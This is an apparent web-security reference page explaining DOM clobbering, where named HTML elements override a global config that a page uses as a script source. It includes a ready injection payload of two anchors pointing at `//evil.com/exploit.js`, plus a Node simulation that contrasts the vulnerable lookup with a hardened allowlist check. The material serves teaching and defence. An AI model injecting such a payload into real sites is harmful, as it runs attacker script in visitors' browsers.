DOM Clobbering
Last modified: 2023-06-15
Basic Exploitation
Suppose the website builds a script tag from a configuration object that it reads off the global `window` scope when the page loads, as below:
window.onload = function() {
  // falls back to an empty object if no config was defined; this fallback is the weak spot
  let someObj = window.someObj || {};
  let script = document.createElement('script');
  // whatever someObj.url holds becomes the script source (non-strings are stringified)
  script.src = someObj.url;
  document.body.appendChild(script);
}
If `window.someObj` is not defined by the page, we can define it ourselves with HTML, because named elements (`id` or `name` attributes) are exposed as properties of `window` and `document`. Two anchors sharing the same `id` make `window.someObj` an HTMLCollection; a named lookup on that collection (`someObj.url`) returns the anchor whose `name` is `url`; and an anchor element stringifies to its `href`. So `script.src` ends up pointing at our URL and the browser executes arbitrary JavaScript from it, with no script injection needed, which is why this works even where `<script>` tags are filtered but `<a>` tags are allowed.
For example, inject the following HTML wherever the target site renders user-supplied markup (a comment, a profile field, a search result, etc.):
<a id=someObj><a id=someObj name=url href=//evil.com/exploit.js>
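The following is an added example, not code from the original page: it puts the page's vulnerable lookup next to a hardened version and runs under Node, which has no DOM. Since Node cannot create real anchor elements, the clobbered global is simulated by a stand-in class that behaves the way the browser's HTMLCollection does for this purpose (named property `url` returns an object that stringifies to its `href`). The allowlisted origin `https://cdn.example.com` and the page origin `https://app.example.com` are assumptions.

```javascript
// Added example (not from the original page). Simulates DOM clobbering of
// `window.someObj` and shows why a type check plus origin allowlist defeats it.

// Stand-in for what the browser produces after the payload
// <a id=someObj><a id=someObj name=url href=//evil.com/exploit.js> is injected:
// two anchors with the same id yield an HTMLCollection, its named property
// "url" is the second anchor, and an anchor stringifies to its href.
class FakeHTMLCollection {
  get url() {
    return { href: '//evil.com/exploit.js', toString() { return this.href; } };
  }
}

// Vulnerable: mirrors the page's snippet. script.src coerces non-strings with
// toString(), so an anchor element becomes its href.
function unsafeScriptUrl(someObj) {
  const cfg = someObj || {};
  return String(cfg.url); // the value script.src would end up holding
}

// Hardened: accept only a plain object whose url is a string on an allowlisted origin.
const ALLOWED_ORIGINS = new Set(['https://cdn.example.com']); // assumed allowlist

function isPlainObject(x) {
  if (x === null || typeof x !== 'object') return false;
  const proto = Object.getPrototypeOf(x);
  // Elements and HTMLCollections inherit from DOM prototypes, never Object.prototype
  return proto === Object.prototype || proto === null;
}

function safeScriptUrl(someObj, pageOrigin = 'https://app.example.com') {
  if (!isPlainObject(someObj)) return null;          // clobbered HTMLCollection / Element stops here
  if (typeof someObj.url !== 'string') return null;  // an anchor element stops here
  let parsed;
  try {
    parsed = new URL(someObj.url, pageOrigin);       // resolves protocol-relative //evil.com
  } catch {
    return null;
  }
  if (!ALLOWED_ORIGINS.has(parsed.origin)) return null; // https://evil.com is not allowlisted
  return parsed.href;
}

// Stand-alone demonstration
console.log('unsafe, clobbered :', unsafeScriptUrl(new FakeHTMLCollection()));
console.log('safe, clobbered   :', safeScriptUrl(new FakeHTMLCollection()));
console.log('safe, legit config:', safeScriptUrl({ url: 'https://cdn.example.com/app.js' }));
```

The plain-object check matters as much as the allowlist: a string `url` on a clobbered object cannot occur in the browser (the named property is always an element), but a page that later switches to JSON-derived config would still be protected by the origin check, and neither check alone covers both cases.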